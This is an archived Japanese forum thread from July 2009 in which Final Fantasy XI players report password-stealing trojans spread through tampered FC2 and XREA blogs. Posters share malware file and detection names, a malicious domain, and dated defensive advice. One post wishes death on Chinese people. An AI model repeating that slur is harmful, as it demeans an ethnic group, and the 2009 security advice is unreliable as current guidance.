●その他の情報・症状など ・垢ハックされる前、どのアプリケーションも開くのに時間が掛かるようになった
・FF11内で特定の業者からのスパム(実際はスパムと言えるほどでもない)Tellを受けた
ログインしてからログアウトするまでTellは続いたので何か関係あるかも?

656:既にその名前は使われています
09/07/11 00:52:33 P2rH1067
>>654
スパムtellは何も関係ないと思うよ。キャラ名とパスを同じにしてたとかなら可能性ないわけじゃないけど。
普通にノーガード戦法でウイルス感染してパス抜かれただけかと。
今ちょうどいろんなところでまたWEBページが改竄されてウイルススクリプトが注入されてるからね。
で、PCを投げ捨てろとまでは言わないから、まとめサイトでも何でもいいからセキュリティを1から勉強しておいで

正直一度クリンスコした方がいいと思う

657:既にその名前は使われています
09/07/11 01:10:17 QFH0XA4M
IE6の時点で問題外
a.exeで感染してる
クリインスコとキャラ巻き戻しサービスの手続きをオススメ


658:既にその名前は使われています
09/07/11 01:16:34 u56MfgE+
diskcheck.exe
flashaegh.dll
この2つが見つかった。ありがとう。
後者はセーフモードからじゃないと削除できなないので、KcrnaeghDrv.dllも
探したけどなかった。

私みないな迂闊な人間はOSデュアルブートを真剣に学んだ方が良い感じがする。
(HB32.dllに感染した者です)

ちなみにflashaegh.dllが作成された時間に見てたのはPSUのWIKIと武器グラ表示ページとPSU公式。
PSU WIKIは半分壊れているページがあったので一番怪しいが、
武器グラ表示HPは大量の画像があって....

659:既にその名前は使われています
09/07/11 02:23:37 vrKQLY1M
無防備すぎる・・・。今まで感染してなかった?のが不思議。

660:既にその名前は使われています
09/07/11 02:38:11 KEVysvXP
IE6よりノーガードが敗因の気ガス

661:既にその名前は使われています
09/07/11 02:50:00 sGddQ2a5
いろんなのが住んでそうだな

662:既にその名前は使われています
09/07/11 03:42:56 PXc2DYEr
ところで今は何の話題論じてるん?

663:既にその名前は使われています
09/07/11 03:43:27 C1OMDK8J
今回の騒動で初めて感染?してしまいました

●不審なアドレス 某長ズボンブログ
●他人が貴方のIDを利用したことがあるか  NO
●ID・Passの認証方法 ワンタイム無使用 自動ログイン
●他人が貴方の~ネットカフェの利用まで NO
●使ってるOS XP Home SP3
●使ってるブラウザ IE7
●WindowsUpdateの有無 自動更新
●FlashPlayerとRealPlayer FlashPlayerのみ導入 Ver10
●アンチウィルスソフト状況 カスペルスキーインターネットセキュリティ2009
●その他同上
●ウィルススキャン結果 Trojan-Downloader.JS.Iframe.bjt
●スレログやテンプレを読んだか YES
●hosts変更 無
●PeerGuardian2の導入 無



664:既にその名前は使われています
09/07/11 03:45:09 C1OMDK8J
●その他の情報・症状など
最初HP閲覧した時にトロイの木馬 Exploit.JS.DirectShow.bの警告が出てすぐに駆除された
その後に完全スキャンした結果 Trojan-Downloader.JS.Iframe.bjtがドライブに存在する警告と
駆除が出来ないので削除しろとカスペルスキーに命令されすぐに削除

とりあえず今のところ平穏でログインできます。ちなみにトークンはその水曜日に到着したので使っています
>>631さんのリストにあるファイル名は発見されませんでした。
アカウントパスの変更はしたほうがよろしいのでしょうか?トロイの発見は初めての経験なので非常に焦っています(泣)

665:既にその名前は使われています
09/07/11 03:47:05 rvm3UOvy
ワンタイム無って描いてるのにトークン使ってるとはこれいかに

666:既にその名前は使われています
09/07/11 03:50:35 C1OMDK8J
>>665
丁度トロイの警告が出た時はまだ受け取ってなく未使用状態でした
受け取って色々と利用手続きを終えて利用し始めたのは木曜日からです

667:既にその名前は使われています
09/07/11 03:54:22 1f5lKcKL
何でトロイの警告でてから
そのPCでIDパス入れて登録しようと思うんだ・・・

668:既にその名前は使われています
09/07/11 03:56:40 hOYYTWKY
まぁトークン導入したのならPOLアカに関してはまず大丈夫だろう。
他のパスなど等が心配なら手っ取り早くクリーンインストール。
次からは感染する前に慌てよう。

669:既にその名前は使われています
09/07/11 03:59:28 C1OMDK8J
もう少しこちらの対応を詳しくします(泣)

・水曜日
FF11ブログからトロイ警告→自動駆除

・木曜日
警告が出たPCを完全スキャン→トロイ発見→手動削除
別のPCからスクエニアカウントなどの手続きを済ませてトークン利用開始
感染警告が出ていないほうのPCでまずPOLの設定を変更
その後、感染したほうのPCでもPOL設定を変更という手順で行いました

670:既にその名前は使われています
09/07/11 04:00:59 1f5lKcKL
重要な部分後出しうざい

671:既にその名前は使われています
09/07/11 04:03:08 C1OMDK8J
>>668
ご忠告ありがとうございます

>>670
すみません、このスレを見て今週の出来事は大事だと気づいて
ようやく冷静に行動を振り返る努力をしています(泣

672:既にその名前は使われています
09/07/11 04:03:16 hKW6xohw
何の役にも立たんチャチャいれるやつもうざい

673:既にその名前は使われています
09/07/11 04:05:28 jeVpiTmh
まあ意外に慌ててチョンポしてるようで肝心なとこは冷静に対処してるようにも思えるがw
俺も感染したことがないから感染時の行動としてはベターなのかは知らないけど
大丈夫そうなんじゃないか?w無責任な言い方してしまうがw

674:既にその名前は使われています
09/07/11 04:08:59 gr8gBz0F
感染時としては間違っていないと思う

675:既にその名前は使われています
09/07/11 04:23:05 iCfQom4n
>>669
そのブログってどこ?

676:既にその名前は使われています
09/07/11 04:30:04 rvm3UOvy
長ズボンブログっつったらPoruruしかねーだろ

677:既にその名前は使われています
09/07/11 04:40:38 iCfQom4n
>>676
ああごめん663見逃してたわ

678:既にその名前は使われています
09/07/11 04:41:18 9y3B5xnk
value xrea fc2がやられてんのか。
こんだけやられると、誰でもいつ踏んでもおかしくないな。

679:既にその名前は使われています
09/07/11 06:34:23 ECLdzOLE
このトロイのターゲットはFF11だけじゃないな
RMTに関与してるMMOほとんどみたいだ

680:既にその名前は使われています
09/07/11 06:36:57 2MehCNP8
>>678
fc2ブログ管理人です
毎日ソースチェッカーオンラインでチェックしています
うちのMMO住人はRMT価格が安いのでうちには関係ない、スレちだととりあいません
うちのMMOのFC2ブログは600以上あり
どこで踏むかわかりません
どなたか 事前対策とMMO以外の影響について教えてください

681:既にその名前は使われています
09/07/11 09:10:16 da++l0Fu
>>680
だがFEZテメーはだめだ

682:既にその名前は使われています
09/07/11 10:14:36 r12E7mJJ
>>680
fc2、xrea丸焼き

683:既にその名前は使われています
09/07/11 11:48:08 G3LTvNXw
208


684:既にその名前は使われています
09/07/11 12:14:24 x8k8cFxr
こんかいのFC2改ざんってどの辺の脆弱性ついてくるの?
感染するうちらのほう またFPとかAdobeですかね

685:既にその名前は使われています
09/07/11 12:28:16 P2rH1067
FFXI(仮)さんのところに詳しく載ってるけど、あのブログ自体fc2だから
質問者に閲覧を推奨しづらいんだよなw
あそこはむしろ改竄監視のために作られたらしいから安全なはずだけど。
>>684
定期的に提供されてるupdateを適用するだけじゃまだ防げないっぽい。
URLリンク(d.hatena.ne.jp)
仮さんのトラバ元にも解説あるから、詳しく知りたいなら見ておいで。

あと、PG2のリストには元から載ってて防げるし、スクリプトだからNoScriptはじめ
スクリプトブロック系のアドオンを入れてるなら誤クリック許可でもしない限り大丈夫

686:既にその名前は使われています
09/07/11 12:31:41 PvRfjWAZ
>>680
ソースチェッカーはキャッシュを参照してるから、最新の情報じゃないよ。
ぴょん吉とか、その時点のソースを見れるもの使わないと
ブログによっては数週間前のもの調べていることになる。

687:既にその名前は使われています
09/07/11 12:32:02 x8k8cFxr
うわ・・・ ゼロデイ攻撃か ActiveXの脆弱性をついたものね 

ありがとう!

688:既にその名前は使われています
09/07/11 13:34:09 2MehCNP8
>>681-687
ありがとうございます
難しすぎて専門家におまかせします

689:既にその名前は使われています
09/07/11 13:40:58 u56MfgE+
virustotalでは既に報告されてて問題なさそう?だけど、
System32を詳細表示にして作成順に並べて単体で作成されたファイルを全てグーグルで検索してたら、
ウィルスっぽいの発見。
日本語のサイトはキャッシュしか見れないし、
英語のサイトをむやみに見たくないので確証ないですがexitwx.exe。
5/21に感染してるから、数回カスペルさんの完全チェックをパスして来たことに。


690:既にその名前は使われています
09/07/11 14:20:03 u56MfgE+
またパス抜かれて、POLログインしようとされたみたいで、
前回のログイン、寝ている時間.....orz
トークンあったので実害なし。パス変更しました。
STTとかに報告すべきでしょうか?

691:既にその名前は使われています
09/07/11 14:30:26 sGddQ2a5
何したいのかわからん
とっとと報告でも何でもしてOS入れなおせばいいじゃない

692:既にその名前は使われています
09/07/11 14:31:16 P2rH1067
>>690
見よう見まねで駆除するくらいならクリンスコ推奨
その後スクリプトを切れるブラウザかPG2導入したほうがいい。
今のままじゃ見えないところに根を張ってる可能性高いよ。
報告の必要はそれほど無さそうだけど、やりたいならWEBからメールだけ入れとけば
いいんじゃないかな

693:既にその名前は使われています
09/07/11 15:43:43 H/xZwyTO
ぬるぽ上げ
すぐ200より下に落ちるな

694:既にその名前は使われています
09/07/11 15:49:06 u56MfgE+
何かあれば初期状態に戻します、っていつまでも
某PCでポほいほいに掛かる惰弱で居たくないから、
再インストールは避けて対策したい。
そういうひねくれ者も居ていいのかなと思う。
Webアンチウィルスでスクリプトチェックしても意味がなかったので、
PG2は導入しました。
まぁ勝手にしろと言われるだろうから、ROMに戻ります。

695:既にその名前は使われています
09/07/11 15:50:20 57rDmzwG
カスペならウイルス対策完璧だと過信している
再度パスを抜かれてもクリーンインスコが真っ先に出てこない
PG2等の別の有効な対策ソフトを今後導入する気などまるでない

今後も何度でもパス抜かれるフラグがこれだけ揃うと、むしろ清々しい


696:既にその名前は使われています
09/07/11 15:53:46 H/xZwyTO
質問 昨日ゼオルムで採掘してたら
目の前でポイントが消えた それから2周くらいポイントが有る場所を廻っても見つからなかった
オカルトだと思っていたポイント引き寄せツールてっ実在するの?

697:既にその名前は使われています
09/07/11 16:02:17 x8k8cFxr
んなモンあるわけねーだろw

業者がただの移動ツールで地中移動してるだけだろ

698:既にその名前は使われています
09/07/11 16:18:31 H/xZwyTO
やっぱり オカルトかあ 目の前でポイントが消える現象は地中で掘られたからか
綺麗に掃除されたと思った業者がもう復活ですよ orz

699:既にその名前は使われています
09/07/11 16:28:50 m5ZVV+P2
FC2ブログ、戦士スキーさんとこもやられたのか
なんか去年やられたとこばっかな気がするな

700:既にその名前は使われています
09/07/11 16:32:17 IYn7XmWO
未だにFC2ブログ使ってる奴・見てる奴がアホなだけ

701:既にその名前は使われています
09/07/11 16:33:39 LXH5SE7v
FC2じゃないブログなら平気だと思ってるやつもアホだけどな

702:既にその名前は使われています
09/07/11 16:39:30 sGddQ2a5
>>694
何事においても基本は大事という言葉を差し上げたい

703:既にその名前は使われています
09/07/11 16:50:17 V/hDaYqj
まっさらにしてからOSを入れ直すかどうか、これだけの情報があるなかで
判断できないのが真の情弱。

704:既にその名前は使われています
09/07/11 16:51:18 7ejiMdEq
>>698
一定時間でポイント移動するよ

705:既にその名前は使われています
09/07/11 16:54:10 KEVysvXP
exitwx.exe、うちにもあった。バスター通してるわ。
クリーンインスコの前に正体知りたい。何だろ?

706:既にその名前は使われています
09/07/11 17:11:44 FsqiNYyY
今北
管理者ページに移行しようとしたPGにひっかかったんで
もしやと思って見てみれば案の定だわ

中国人マジで死ねばいいのに

707:既にその名前は使われています
09/07/11 17:13:09 eDUkOV3t
うちもあった。右クリックのプロパティみるとトレンドマイクロの電子署名があるね。
作成日みると、ウィルスバスター2009にアップグレードした日だった。

708:既にその名前は使われています
09/07/11 17:25:07 h7/bW4ZH
うちのバスター入ってるPCにもあった
2007年8月12日に何したか覚えてねぇ
電子署名も同じ
45.3 KB (46,456 バイト)
48.0 KB (49,152 バイト)ダィスク上

709:既にその名前は使われています
09/07/11 17:31:02 pM1s0XCZ
exitwx.exeでググって出たページ

「有料エロサイトの画面が消えません」




710:既にその名前は使われています
09/07/11 17:32:33 PvRfjWAZ
>>696
不正な方法で採掘などを行うキャラにはいくつものパターンがあって
地中をタゲれるタイプから、タゲれないのに採掘をしているタイプに移行した。
その状態を説明する1つで、ポイントを引き寄せているんじゃないかという説。
実際は、業者はエリアに入ってからどこかにワープして姿を隠していることと
通報ブログの人の検証で、姿は見えないがマップ内を移動していたということから
地上からはタゲれない位置を移動しながら採掘している説が有力だけど、正確には分かっていない。

>>696の報告では、まだ偶然の可能性もある。
その時にエリアサーチして不審な名前をチェックし、収穫物の売り履歴が無ければ黒濃厚。
履歴がある場合は、偶然同じ経路で掘っている誰かの後を、696さんが追いかけてるとかかもしれない。

711:既にその名前は使われています
09/07/11 19:01:24 FsqiNYyY
えふしー2.こmに飛ぼうとした時点でPGが反応するな
こりゃ本体鯖がクラッキングされてんじゃね?


712:既にその名前は使われています
09/07/11 19:08:46 P2rH1067
>>711
反応時のIPは?

713:既にその名前は使われています
09/07/11 19:16:54 FsqiNYyY
>>712
208.71.106.124 へllh.net

714:既にその名前は使われています
09/07/11 19:20:46 FsqiNYyY
www.へllh.netをAguse.jpで調べてみた結果がコレだよ!


サイト登録日

2009-07-11 12:12:23
サイトのタイトル

FC2 total Web Solutions- 無料ホームページ アクセス解析 ブログ レンタルサーバー SEO 対策 等 -
実際に表示されるサイトのURL

URLリンク(www.hellh.net)
IPアドレス

208.71.106.124
逆引きホスト名

sata4.fc2.com

715:既にその名前は使われています
09/07/11 19:21:51 P2rH1067
志村一箇所伏せ忘れてるやばいw

716:既にその名前は使われています
09/07/11 19:25:34 FsqiNYyY
>>715
ああああすまんごめん直し忘れた

>>714のURLは踏むなよ!絶対だぞ!

717:既にその名前は使われています
09/07/11 19:25:58 LvTSwR4T
へllh.netって今回の騒ぎの場所かw
FC2普段も激重だしもう潰れろよ…

718:既にその名前は使われています
09/07/11 19:27:07 gTv8+OBE
追い討ちでアンカーつけてるぞw

719:既にその名前は使われています
09/07/11 19:36:14 6eB3JnpL
>>711は ブクマからFC2にとぼうととしたの?
それともどこかのリンクからとぼうとしたのか 【興味があります】

ともあれ
aguseで へllh.net(httpころんすらすらsata4●fc2.com/)のスクショをみると完全にFC2だな、、、
フィッシングサイトなのか ここで引っかかった人もいるのかもわからんね。
デジロの件といい困ったもんだ。

720:既にその名前は使われています
09/07/11 19:38:32 6eB3JnpL
連投すまん
ROのセキュスレから転載

291 名前:(○口○*)さん[sage] 投稿日:09/07/11(土) 19:32 ID:/ayd0JzK0
>>286の件と関係あるかわからないが、今FC2Blogの管理画面にアクセスすると、
www■hellh■netに誘導される(PG2がブロックして気づいた)
管理画面だけで、Blogそのものに攻撃コードは無かった

とりあえずサポートに連絡してくる

721:既にその名前は使われています
09/07/11 19:41:07 FsqiNYyY
>>719
最初はFC2ブログのトップページから
ログイン画面へ移行しようとしたらPG反応

次にFC2でググって一番上にくるサイト「FC2.com」から
飛ぼうとしたらPG反応


722:既にその名前は使われています
09/07/11 19:47:36 VsyGByvf
>>721
FC2ブログなんて使ってんなよw

723:既にその名前は使われています
09/07/11 19:55:45 FsqiNYyY
>>722
妹にそう伝えておくわw

724:既にその名前は使われています
09/07/11 20:14:27 sGddQ2a5
>>719
いつものiframeかとおもったら違ってわろた
まんまFC2みたいだなー

googleセーフブラウジングさんは認識済みのようだ
www●hellh●net の現在のステータス

疑わしいサイトとして認識されています。
このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。

725:既にその名前は使われています
09/07/11 20:16:46 P2rH1067
すぐ落ちるだろうけど注意喚起のために一度fc2でスレ立てしたほうがいいかもね
お客様の中に●持ちはいらっしゃいませんかー

726:既にその名前は使われています
09/07/11 20:18:43 FsqiNYyY
>>725
立てるんでタイトルと本文をくれい

727:既にその名前は使われています
09/07/11 20:21:31 sGddQ2a5
これはどういうことだろう
FC2へ転送されてるわけじゃないから実際にFC2のコピペソースを
貼ってるんだろうけど有害そうなところが見当たらない
見落としているだけかな

それともこれから何かするところ?

728:既にその名前は使われています
09/07/11 20:28:28 ZQMqZI92
hellh●netの所有者がwww●hellh●netのAレコードをfc2●comのIPアドレスと
同じ208.71.106.124に設定した。

fc2●comは2007年9月ごろから208.71.106.124で変わりなし。
URLリンク(uptime.netcraft.com)

リネージュ資料室さん(あるいはスクリプト)は、www●hellh●netを正引きして
IPアドレスが110.165.41.103から208.71.106.124に変わったので
MMORPGトロイリストを更新した。
その結果、fc2にアクセスしようとするとPG2がアクセスをブロックする。

729:既にその名前は使われています
09/07/11 20:35:39 VsyGByvf
>>728
任意のIPに変えるマネなんて出来るのか
すげーな

730:既にその名前は使われています
09/07/11 20:43:22 sGddQ2a5
あーなるほろ
そりゃFC2そのものが出てくるわけだな

731:既にその名前は使われています
09/07/11 20:50:56 Vg8uTGbG
>>685
FFXI(仮)さんは忍者にミラーブログ持ってるよ

732:既にその名前は使われています
09/07/11 20:51:56 VsyGByvf
実害の可能性は低いってことか
それじゃ業者は一体何が目的なんだ?嫌がらせ?w

733:既にその名前は使われています
09/07/11 20:53:51 2MehCNP8
えふしーつーは結局あぶない?
さわらない?
更新しちゃいけない?

でおk?

734:既にその名前は使われています
09/07/11 20:57:06 dq0WjyaK
えふしーつーはもうアカン。

アプリの作りが駄目なんだろう。
色々機能充実させた結果がこれ。

735:既にその名前は使われています
09/07/11 21:00:44 P2rH1067
そういう仕組みかー
>>733
トップページの件はこれだとしてもまた改竄されてるブログあるから
しばらく近づかないほうがいいと思うよ。ブログ持ちなら凍結か移転

736:既にその名前は使われています
09/07/11 21:07:45 2MehCNP8
>>735
即レスあり

メインblogではないのでしばらく放置します

737:既にその名前は使われています
09/07/11 21:11:39 ONpfMVdd
>あと、PG2のリストには元から載ってて防げるし、スクリプトだからNoScriptはじめ
>スクリプトブロック系のアドオンを入れてるなら誤クリック許可でもしない限り大丈夫

NoScriptってfc2を許可してたらfc2に埋め込まれた外部スクリプトも読み込まれるの?
この香港ドメインのスクリプト

738:既にその名前は使われています
09/07/11 21:15:25 2MehCNP8
>>726さんのスレがどこかわからないので教えてください

739:既にその名前は使われています
09/07/11 21:19:14 Ykmes8RC
NoScriptはIP関係なしに純粋にドメインで判断するから平気じゃね?

740:既にその名前は使われています
09/07/11 21:30:41 IYn7XmWO
xreaのアクセスアナライザー見てきたけど、NoScriptでxrea許可しても「なんちゃら:888」はブロックしてた
だからって安全とは言い切れないけどな

741:既にその名前は使われています
09/07/11 22:05:55 ONpfMVdd
>>739-740
thx
NoScriptの仕組みを知っておきたかった

742:既にその名前は使われています
09/07/11 23:40:52 6eB3JnpL
>>721
ありがと 自分の環境だとFC2ぐぐってでた一番上にアクセスしても
PG2反応なしで多分正常なサイトにつながる。
もしまだ見てるようなら念のためhostsファイル等の書き換えはされてないか確認して欲しい。

しかしどうしたもんかこの状況。
まとめでよくつかわれてる@wikiやリネ資さんもXREAなんだよな・・
あーあとテンプレの FF11Warningもかなり前にどっかに移転済みだとおもう。
変更しといたほうがいいな。

743:既にその名前は使われています
09/07/11 23:51:06 LvTSwR4T
自分も>>721になるけど理由を>>728が解明してくれて少し安心した
しかしこのパス抜き誘導先はなんでFC2のふりしてるんだろ

744:既にその名前は使われています
09/07/12 00:24:05 ow5Gvdeb
ここ数日ご無沙汰だったRMTtellがキタワァ

745:既にその名前は使われています
09/07/12 01:42:52 RKpYH8Lt
gnomeさんとこでてた
URLリンク(www3.atword.jp)

746:既にその名前は使われています
09/07/12 01:58:28 anR057D/
ラグ鯖の Boromekyf RMTテルウゼーよ
いい加減取り締まれよGM



747:既にその名前は使われています
09/07/12 03:02:11 BInk1tL3
ラグ鯖の Boromekyf RMTテルウゼーよ
いい加減取り締まれよGM

748:既にその名前は使われています
09/07/12 03:22:34 49sy0jHJ
おやすみなさいage

749:既にその名前は使われています
09/07/12 07:39:19 s/e3ULGd
おはよう

750:既にその名前は使われています
09/07/12 09:31:25 uDWEbSid
おはすみ

751:既にその名前は使われています
09/07/12 11:25:09 YzqDDQ7f
おやすみ

752:既にその名前は使われています
09/07/12 12:38:20 eEa1yi+c
Kujata

鉱山区に続々復活中の業者
Cnnp,DFmn,Ersd,Gfhk,Qaes,Ujabcpp,Ujcypp,Ujerl,Ujipp,Ujxxaa,Ujxxp,Utyt,Xwdf,
Gfth,Smjd,Ujia,Wuzzp,Kujzou,Ujerm,Ujxxbb,
などシリーズもの多数

753:既にその名前は使われています
09/07/12 14:26:46 Sgc9put3
>>728
ドメインとれば、どう設定しようと取得者の自由だからな
yahooサイトにされてもおかしくないw

754:既にその名前は使われています
09/07/12 15:15:24 eCLXtZRn
ユーザーが諦めの境地、みたいなぁ

755:既にその名前は使われています
09/07/12 16:09:29 YzqDDQ7f
サンディの評判が悪くて超うける!

756:既にその名前は使われています
09/07/12 18:04:50 aQFvARwn
いつも見に行ってるコミックレビューブログがFC2にあるんだけど、
ブログ本体には特に改竄はみられなかったものの、
コメント投稿後の確認フォーム「のみ」でPG2が反応、hellhどっとねっと をブロック

あれって個別のブログで設定うんぬんできる場所だっけ
じゃなかったら結構根っこまでやられてるんじゃ

757:既にその名前は使われています
09/07/12 18:06:46 pvVjPTCy
>>756
アドレスうpもしくは管理人に連絡

758:既にその名前は使われています
09/07/12 18:48:36 aQFvARwn
>>757
URLリンク(ikesanfromfrneore.blog64.fc2.com)

管理人には一応記事にコメントで残した

759:既にその名前は使われています
09/07/12 18:55:15 pvVjPTCy
それ大手じゃねーか
コメント欄見たら踏むなよ扱いされててわろた
踏むなよてコメした奴感染してるんじゃないかw

760:既にその名前は使われています
09/07/12 19:14:03 ZCuRR65z
>>756
>>728

761:既にその名前は使われています
09/07/12 19:14:04 rqIaPGyC
URLリンク(enif.mmobbs.com)
このへん

762:既にその名前は使われています
09/07/12 19:31:31 aQFvARwn
>>760
投稿確認画面で取りに行くFC2要素の中に
地獄えっちが設定したIPと同じ取得先のものが含まれてて
それが反応・遮断してると考えればいいのかな?

763:既にその名前は使われています
09/07/12 20:49:15 mOImfbCB
age

764:既にその名前は使われています
09/07/12 21:56:42 mOImfbCB
ageage

765:既にその名前は使われています
09/07/12 21:58:00 DgLNURgH
URLリンク(www.wired-rmt.jp)

詐欺サイト注意

766:既にその名前は使われています
09/07/12 21:59:38 YzqDDQ7f
宣伝乙

767:既にその名前は使われています
09/07/12 23:40:32 pvVjPTCy
ハリー見てて保守わすれてた

768:既にその名前は使われています
09/07/12 23:44:39 H0E8IJWv
えくすぺくとぱとろーなむ

769:既にその名前は使われています
09/07/13 00:33:12 Pq+nwdNF
寝保

770:既にその名前は使われています
09/07/13 01:02:29 hIaEF8qy
657 名前:Trackback(774)[] 投稿日:2009/07/13(月) 00:51:22 ID:je1sGQC9
[EMERGENCY] XREA again and spreading via FC2
URLリンク(www3.atword.jp)

IE使ってる人は感染確認を

771:既にその名前は使われています
09/07/13 02:47:37 kcbz4oo2
相当手痛いバンだったのか、いまだうちの鯖じゃ栽培業者現れず
主要鯖に絞り込んでるのかね

772:既にその名前は使われています
09/07/13 04:45:05 C9i47a2N
>>770>>631と同じ内容。

773:既にその名前は使われています
09/07/13 04:49:04 OpszT54j
最近やたらと素材の出品が多いんだけどそっちにシフトしたんだろうか?

774:既にその名前は使われています
09/07/13 08:09:37 FcYGrne5
携帯でfc2のブログ数ヶ所回ったら、読み込んだ後に3,4回更に読み込むんだが
今までこんな事なかったけど、また何か埋め込まれてないか?

775:既にその名前は使われています
09/07/13 08:15:24 11gPjod0
蛇鯖だと人気アイテムの高騰かな~?アダマンキュイラスは別段上がってない。
昔は外人鯖とか呼ばれていたし安くなったギルでリアルマネーで楽しく買い物、なのかな?

776:既にその名前は使われています
09/07/13 08:21:30 H1LLs83z
空気を読まずに投下

URLリンク(www.virustotal.com)

41の最新版にスルーされる不明ファイルか…

777:既にその名前は使われています
09/07/13 09:12:37 hIaEF8qy
>>774
スレリンク(blog板:644番)
これ?

778:既にその名前は使われています
09/07/13 09:15:38 hIaEF8qy
151

779:既にその名前は使われています
09/07/13 10:39:08 EGTKRVer
うわー。
たった今、ブロガメからRMTtellきたわ。Kujata。
ここ暫く来てなかったのにな。
32.59$って、値上がった?
休みだからって外人タイムにINした途端にこれだよ。


780:既にその名前は使われています
09/07/13 10:43:07 C9i47a2N
ギル売りの宣伝はいらんよ。

781:既にその名前は使われています
09/07/13 11:05:01 76zQ+reh
昨日36ドルだったけど今日いきなり31.5ドルに下がっててワロタ

782:既にその名前は使われています
09/07/13 11:19:28 cifK2VO1
バン祭り前に比べると倍になってんだな

783:既にその名前は使われています
09/07/13 11:27:35 A+8fNveH
昨日の中国ドキュメント番組で医療関係の話をしていたんだが、
診察してもらうために診察券が要る(有料)→診察券を取るためには並ばなくてはならない
→マイナス4℃とかの気温の中徹夜で並ぶほど盛況→もちろん中国なのでこんな場所にはダフ屋が大量発生する
→診察券を数十倍の価格で売る

やっぱRMTひでー

784:既にその名前は使われています
09/07/13 12:41:53 /CxV3tV3
あげ

785:既にその名前は使われています
09/07/13 12:47:52 PeWqyWsX
>>783
並ぶ労力と自分の時間当たりの単価との比較じゃないの?
富裕層向けの病院の部分見てないのか?
年収1000万のネ実民はダフ屋で買おうが平気だろう

786:既にその名前は使われています
09/07/13 13:05:38 eRKBB7xz
>>771
蛇鯖
先々週末はIdシリーズ4匹、三文字乱打系0くらいまで減ってたが
先週毎日Idシリーズ12匹と3文字乱打系が6匹、DvDqYq等のシリーズが2匹ずつ
Mid系3匹と入れ替わり鉱山区の植木鉢販売NPCのところに大量に群がってた。

もう収穫始まってるようで、以前同様ギル受け取り係がモグ前座ってる。

787:既にその名前は使われています
09/07/13 13:49:29 3vwqA3gn
業者の人件費があほみたいに安いとしても
15ドルとかで通常垢栽培で利益なんか出ないだろ
FT垢の栽培禁止にしろよぼけなすぐろばかさぎすんぢ

788:既にその名前は使われています
09/07/13 14:06:53 hj4uExuj
寝釣り時代 FTはあったか?
そういうことだ

789:既にその名前は使われています
09/07/13 15:01:37 11gPjod0
別段不正クレカ使用が止んだ、とかってニュース聞かないし
FT垢以外もあるんでない?複合活用だろう。

790:既にその名前は使われています
09/07/13 16:02:23 PLj0YWIG
Kujata バス鉱山区

Bvvf,Fedd,Hnjh,Huiv,Jhoh,Sdem,Tytu,UyufなどがさらにPOP中。


791:既にその名前は使われています
09/07/13 16:13:22 PLj0YWIG
Kujataはマジで諦めの境地に近いな。

URLリンク(minus-k.com)
URLリンク(minus-k.com)

792:既にその名前は使われています
09/07/13 16:38:57 Terl90Wx
そういうスレじゃないんだけどね・・・・
つうかセキュリティ知識乏しい人ほど
fc2とか使うからほんと困る。

793:既にその名前は使われています
09/07/13 17:06:56 Pq+nwdNF
コミュニティツールにFF11って言うおまけゲームがついて来る、
って感覚のライトプレイヤーも結構居そうだもんな。

794:既にその名前は使われています
09/07/13 17:49:49 hIaEF8qy
URLリンク(fc2support.blog85.fc2.com)
【追記 2009年 7月13日 12時30分】
サーバーの復旧を致しました。

795:既にその名前は使われています
09/07/13 17:52:02 DkGblpWh
ブログ拍手の復旧なんざどうでもいいんだよ

796:既にその名前は使われています
09/07/13 19:38:16 c74zf/TN
264

797:既にその名前は使われています
09/07/13 20:26:40 867H9RER
ほむり

798:既にその名前は使われています
09/07/13 21:52:24 MNa3XS5x
国内のサイト複数が改ざん~早急にDirectShowの脆弱性回避策の適用を
URLリンク(www.so-net.ne.jp)

799:既にその名前は使われています
09/07/14 00:52:05 dU4dV//N
はっくはっかー・・・

800:既にその名前は使われています
09/07/14 02:58:52 NSlg+d4r
寝る前ホシュ

801:既にその名前は使われています
09/07/14 06:02:50 Ybud3sVt
Office Webコンポーネントに脆弱性
URLリンク(www.microsoft.com)
既に攻撃が行われている。パッチはまだない。
↓のFix itを実行しましょう。
URLリンク(support.microsoft.com)

802:既にその名前は使われています
09/07/14 09:11:38 Em8SmL9M
おはようほしゅ

803:既にその名前は使われています
09/07/14 10:16:21 Em8SmL9M
まだまだほしゅ

804:既にその名前は使われています
09/07/14 10:33:18 i65+qUKD
FC2は過去にやられたところの再改竄があるようだね。
ハニーポット状態の赤石掲示板で今日見かけたもの(再改竄)
dolcevita555■blog84■fc2
IFRAMEにはgeoncities、ここのところ主流の幅30、高さ0。

とりあえずFC2へ通報(対応しても多分IFRAME除去だけだと思うけど)

福建一味の新ドメインを最近見なくなったと思えば今度は黒客でも雇って大規模改竄攻撃にシフトしつつある?
一度やられて対策や移転してないところなんかは再度喰らう可能性大と言うことを意味する。
ブログ持ちは気をつけてくれよな!


805:既にその名前は使われています
09/07/14 10:46:25 kx+gKSOk
結局移転以外の対策が無いように見える
他に対策ってあるのかね?
しかも移転後も閉鎖したら同じURLでブログ作られるから閉鎖できないし
非公開にしてても第七猫さんのところのような例もあるし
ブログ持ちはたいへんだーね

806:既にその名前は使われています
09/07/14 10:48:54 Em8SmL9M
fc2は確か一度閉鎖したら全く同じURLのブログは作れないんじゃなかったかな

807:既にその名前は使われています
09/07/14 12:18:48 Em8SmL9M
昼休みこけっこー

808:既にその名前は使われています
09/07/14 13:40:51 Ybud3sVt
249

809:既にその名前は使われています
09/07/14 14:32:01 fnY8XrwX
改竄されるところって、そもそも運営に問題あるよな。
何度も改竄されるとかありえないわ・・・

810:既にその名前は使われています
09/07/14 16:10:27 U3CZU4Tn
268

811:既にその名前は使われています
09/07/14 17:01:59 KhZzmvrJ
大して効果なくともSTFレポート再開希望。

公式掲示板とかプレミアムサイトとかヴァナディールトリヴューンとか
何でもかんでも途中で投げ出すのいい加減やめてくれ。
打たれ弱すぎるがな。

812:既にその名前は使われています
09/07/14 17:04:15 Em8SmL9M
鈴木みs・・・・

813:既にその名前は使われています
09/07/14 18:05:44 dU4dV//N
鈴木みそとか今でも漫画描いているのだろうか?

814:既にその名前は使われています
09/07/14 18:06:38 LzoZA7Ry
みそなら俺の上で腰振ってるよ


最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch